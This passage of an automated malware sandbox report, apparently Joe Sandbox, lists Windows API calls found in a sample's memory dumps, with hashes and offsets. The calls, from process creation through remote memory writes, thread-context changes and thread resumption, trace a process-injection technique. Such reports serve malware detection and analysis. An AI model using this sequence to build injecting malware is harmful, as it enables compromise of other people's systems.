                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0

                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081278A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B526
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01336021
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01336021
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08127478
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08127478
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08127558
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133D76E,?,?,?,?,?), ref: 0133D82F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081272CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081272CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08127558
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133D76E,?,?,?,?,?), ref: 0133D82F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08127396
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B5A1,00000800,00000000,00000000), ref: 0133B7B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08127396
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B5A1,00000800,00000000,00000000), ref: 0133B7B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08129CD5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B526
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08129CD5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              • Opcode ID: ef2b3432e158a49c29d439bcd94838f6e2b439ac0b5aa215f4f341cda72a565e
                              • Instruction ID: bdc711b3cd2cd8aa1930301c843803f57e42fbfd3b8e6120d40d50844dad3a2d
                              • Opcode Fuzzy Hash: ef2b3432e158a49c29d439bcd94838f6e2b439ac0b5aa215f4f341cda72a565e
                              • Instruction Fuzzy Hash: 47115171B0160A8BCB44EBB999005EFB7FAAB84254F20447AC409E7254EB358D05CBA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: r
                              • API String ID: 0-621588783
                              • Opcode ID: 1eef42bde87fa1ce1d194999dc69a8b9e9a630ce2d6fb2e6a2386c42cdf1de5d
                              • Instruction ID: 9ab8d994c00f3a6d2e9e398e1a5faba591a1c845cbe7deced36d488cf5eefb38
                              • Opcode Fuzzy Hash: 1eef42bde87fa1ce1d194999dc69a8b9e9a630ce2d6fb2e6a2386c42cdf1de5d
                              • Instruction Fuzzy Hash: BBE04F72505149CFCB01CB78C8504ADBFB2EF0A200B195592F424EB263DB399C12DB22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;I
                              • API String ID: 0-1842435098
                              • Opcode ID: 9e33c228685d8ed57803d9dec9a4601adc073aae1131989c75b230ca6a0bb9a1
                              • Instruction ID: 056af17bcf2a024211ea340648dbab39e5dd56b0990527929cc092311f4ef4bd
                              • Opcode Fuzzy Hash: 9e33c228685d8ed57803d9dec9a4601adc073aae1131989c75b230ca6a0bb9a1
                              • Instruction Fuzzy Hash: 65D0123620410D9F4B41EAA4E840D5277DCBB247007408462F544C7020E722E564DB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1707e28d8edb63a1349cfa52e4a87611a05a5586e663a88ab0a88f6e22cd9b2
                              • Instruction ID: 52278b5cefb5485bf02899edd87971e3b5ad208f0abe05a7c811f2c4b2a6b134
                              • Opcode Fuzzy Hash: e1707e28d8edb63a1349cfa52e4a87611a05a5586e663a88ab0a88f6e22cd9b2
                              • Instruction Fuzzy Hash: AA5136B57142158FCB089B7D98546BE3BEBEFC8651B14447AE949C7394DE34CC02C7A0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd54600c660e520a583481a0329a4c068138c79c9b216e5e9f2f8135f7b82b9e
                              • Instruction ID: 4e7ac5c9b965999cac50ddabeb68c1aca2405f7517fd51ebf2163ff4fada77c9
                              • Opcode Fuzzy Hash: dd54600c660e520a583481a0329a4c068138c79c9b216e5e9f2f8135f7b82b9e
                              • Instruction Fuzzy Hash: 015103B0E06109DFEB08DFA9C9407BEBBB3FB85714F14906AE151AB385DB309941CB91
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60b2cd2702b11f317d9171150fe8909a8fbd1a598fd058b9cdba30e6d8cd7d43
                              • Instruction ID: 6973e7d8d9fabe05f2e68fa3e46cae72d44c97001abfe8054b2e0224de47a2c9
                              • Opcode Fuzzy Hash: 60b2cd2702b11f317d9171150fe8909a8fbd1a598fd058b9cdba30e6d8cd7d43
                              • Instruction Fuzzy Hash: 2551D3B0F06109DBEB08DFA9C9417AEBBB3FB84710F14946AE541AB385DB349941CB91
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e48b8a32032cd4263f9400d8cda37d865bc147f5bf7ebf195511b4acd2dbaafb
                              • Instruction ID: ebda8e90a62db8ecea9207cbabfb501c49dc0530009ae1cfcf70b01dd6a34646
                              • Opcode Fuzzy Hash: e48b8a32032cd4263f9400d8cda37d865bc147f5bf7ebf195511b4acd2dbaafb
                              • Instruction Fuzzy Hash: D95126F1A1A296CFC7108F6CD8402BDBBF2AB46215F04E57BE562DB291D739C984C711
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b410d9f4064a795b3db2b9a6ff6d8b62f21fa8692f47cd4a9417fee82d931a1
                              • Instruction ID: 4002bd008c9c1a34e9d77fb5dc2fc499a2e0fa364b58be14e00a01d99e73108c
                              • Opcode Fuzzy Hash: 5b410d9f4064a795b3db2b9a6ff6d8b62f21fa8692f47cd4a9417fee82d931a1
                              • Instruction Fuzzy Hash: 9D51B1B4909684CFD706CB6AE954948BFF0EF4A210B2A80DAD484DF273D7359D55CB13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97836fd6645ba1200aca9b75f51e93163d0defb2f6c0024c2bbf8eea63e1737e
                              • Instruction ID: 9f520333818f9a0d899e92030918101c992dfe264b86442750c16ec0f92d34cf
                              • Opcode Fuzzy Hash: 97836fd6645ba1200aca9b75f51e93163d0defb2f6c0024c2bbf8eea63e1737e
                              • Instruction Fuzzy Hash: 74413AB0B15205CFD714CB68C8447BABBB2FF86316F00916AE125CB392C7749882CB52
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98fe021a6ee2be1f76ba00cc25c3069698125c65aa6b982574b3fee00261204f
                              • Instruction ID: 6edda791d6545fbbb13dad08ec8bd50d77439472e4e7321088894396f65d7b10
                              • Opcode Fuzzy Hash: 98fe021a6ee2be1f76ba00cc25c3069698125c65aa6b982574b3fee00261204f
                              • Instruction Fuzzy Hash: EF41677160111ADFCF15EF68D885AAE7BA6FF84704F148429F802A7394CB30DC96DB90
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 480bbcacfa5c0bc7b7c4d55370f80d80021a7f124ff2a6420bb4639483cbd3a2
                              • Instruction ID: 7d2be6908d302135090453a1b089ec1b5fccee81d5d3e2c01fd7a1f8971d5850
                              • Opcode Fuzzy Hash: 480bbcacfa5c0bc7b7c4d55370f80d80021a7f124ff2a6420bb4639483cbd3a2
                              • Instruction Fuzzy Hash: 7941E4F1A0E292CFD3118B6DC8503AEBFA0AF43209F04D1BBE195DB692D7358985CB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c817f0aa6c8ce653a9e60e4a6fe3ccd91434666aa47b9f5394ae35b3877f3165
                              • Instruction ID: d8f13a0869314937fddbd8fdd7f16c232eac501bf55a48e128eb76e3cae23aef
                              • Opcode Fuzzy Hash: c817f0aa6c8ce653a9e60e4a6fe3ccd91434666aa47b9f5394ae35b3877f3165
                              • Instruction Fuzzy Hash: B0418AB4E0226DAFDF45CFA9D884AEDBBB2BB0A314F10A415E815F7214D7349991CF14
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 993fbea7700faf824e2407a04d78b9313c9a4899c037078396d4059e2302e315
                              • Instruction ID: 653c2c3a0dce4f65bd0e1d6aff87e18e4c7a531ccb102baf504a8c08b357fdd3
                              • Opcode Fuzzy Hash: 993fbea7700faf824e2407a04d78b9313c9a4899c037078396d4059e2302e315
                              • Instruction Fuzzy Hash: 8E41A170A1120ADFDB04EFA8E5416AD7BF6FF84705F0084A8E905A7255EF35AE09CB81
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71a585ea475179ee8cc75e8994e201e5c77da4b84c0576db96a3fa4a5516f75a
                              • Instruction ID: 225864fa80c477d9972afaac3b6cc4f6b820d8f2255868628fb8586f1947a2fd
                              • Opcode Fuzzy Hash: 71a585ea475179ee8cc75e8994e201e5c77da4b84c0576db96a3fa4a5516f75a
                              • Instruction Fuzzy Hash: BD4104B0E2A619DFCB40CFADE9848EEBBF0FB4E210F11A465E456A7211D7309960CB54
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81139293b641c5cdf00797944dc9b35ac39510744a44d18904a30d9b7206a2e8
                              • Instruction ID: 845102da7e5f247b22411bc7203bac39c5158f1c43e477b89a75dc8de76a47ae
                              • Opcode Fuzzy Hash: 81139293b641c5cdf00797944dc9b35ac39510744a44d18904a30d9b7206a2e8
                              • Instruction Fuzzy Hash: 9E31C5B4D26619DFCB40CFA9E9848EEBBF0FB4E210F11E865E456A7215D3309960CB64
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: faed2b72f51089803854a2ef2ec52901b20cd8889a6bd61063e6f2801f94bd24
                              • Instruction ID: 3e83bb9e24031305190580c96db9093e887ea140a0dca64b75f24d1eb154c36a
                              • Opcode Fuzzy Hash: faed2b72f51089803854a2ef2ec52901b20cd8889a6bd61063e6f2801f94bd24
                              • Instruction Fuzzy Hash: D2315EB1A002499FCF10DFA9D884ADEBFF5EF49314F10852AE909E7211D735A944CFA4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 975c92cdc6260d5735760fe11182e99783b7165b5e534f55bcd4090cf7cf1878
                              • Instruction ID: 579c3ab8116532287a42054c27010643f3ca03b0ebd3e78430d3b2daca6b45f7
                              • Opcode Fuzzy Hash: 975c92cdc6260d5735760fe11182e99783b7165b5e534f55bcd4090cf7cf1878
                              • Instruction Fuzzy Hash: 6931BCB1E161169ADB40CF6DC4803EEBBF2BB4A314F0495A6D165EB291D738AD80CB91
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0e9d67c5e0f6e7190fca7fbec8d1c8e693cef137c60617d6082d1363978a7ae
                              • Instruction ID: da63037ecd0808e6437e9b8aeb0ff15fd9147d514cca448727e9909d1a119adb
                              • Opcode Fuzzy Hash: d0e9d67c5e0f6e7190fca7fbec8d1c8e693cef137c60617d6082d1363978a7ae
                              • Instruction Fuzzy Hash: E331AEB2E051569EDB40CF6DC4806EEBBF2BB4A310F1451B6D154E7290D338AD40CB91
                              Memory Dump Source
                              • Source File: 00000000.00000002.1782741060.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_128d000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90a3a99460bba39fbd87de6cf31f97cda0a2c9812a012c757f811ac0aa5bbcb6
                              • Instruction ID: 29ec7444924717b854aaf84bb0cea65cd62ff953daf7d148ee74a26bf1d5f332
                              • Opcode Fuzzy Hash: 90a3a99460bba39fbd87de6cf31f97cda0a2c9812a012c757f811ac0aa5bbcb6
                              • Instruction Fuzzy Hash: A4213671511248DFCF05AF94E9C0F16BFA5FB88318F208269EA090B2D6C376D41ACB61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1782741060.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_128d000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5ff55d8ecb7c2ced8a593adf34c1c6beb812512fed9cf09cc6d44aec0699f221
                              • Instruction ID: 058fb584e2c978f2d2a6ffa4eb596338f50029a058a13a944d5fbcae59d9c413
                              • Opcode Fuzzy Hash: 5ff55d8ecb7c2ced8a593adf34c1c6beb812512fed9cf09cc6d44aec0699f221
                              • Instruction Fuzzy Hash: 7A214575110208DFDB01EF88D9C0B66BF65FB88324F20C169E9090B2D7C376E45ACAA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8328f25f5ef110138e34238697d4e6e7ee427d4a2b7a46e50955a9b6a43b108b
                              • Instruction ID: 6896e5a9908de3a0e426f7429e59f98f758ea8ad50252224f5c698271a5680ab
                              • Opcode Fuzzy Hash: 8328f25f5ef110138e34238697d4e6e7ee427d4a2b7a46e50955a9b6a43b108b
                              • Instruction Fuzzy Hash: 082165B07062164FCF16167988201BEBAA6AFCA214F1440FAD905CB3D1DE71CC4AC7D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1782815513.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12ad000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                              • Instruction ID: ffa64ab6cebec9c618dfeb10ee761fc0a0bf756fde56c6242040ee7c109ec5f7
                              • Opcode Fuzzy Hash: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                              • Instruction Fuzzy Hash: CC216470294208DFCB11DF68D9C0B26BFA1FB88314F60C56DD90A4B656C37BD407CA61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ade7232aac14378527b1835c13ec1e79da5de4c2f8965bf40a215e7b81a953e
                              • Instruction ID: 4dc03925ce5eb8388465c69a106bc7fab98ed7085a5cd98c254a3e660d14a455
                              • Opcode Fuzzy Hash: 4ade7232aac14378527b1835c13ec1e79da5de4c2f8965bf40a215e7b81a953e
                              • Instruction Fuzzy Hash: A431F4B0D01258DFDB20DF99C584BDEBFF8AB09314F208059E408BB250D7755884CFA5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 015058676f081be39709f66f7a77b6d16c93263ee183d1371777668c5e443272
                              • Instruction ID: 61a3b212b7a15eb60f608a13115c6a11fcc7e5404e44b7740ceb2c31c777f028
                              • Opcode Fuzzy Hash: 015058676f081be39709f66f7a77b6d16c93263ee183d1371777668c5e443272
                              • Instruction Fuzzy Hash: 2D11B2B0B09344DFDB01CBB8CD55A793BF9EF56204B2004A6E809C7252EA30DD02CB21
                              Memory Dump Source
                              • Source File: 00000000.00000002.1782815513.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12ad000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
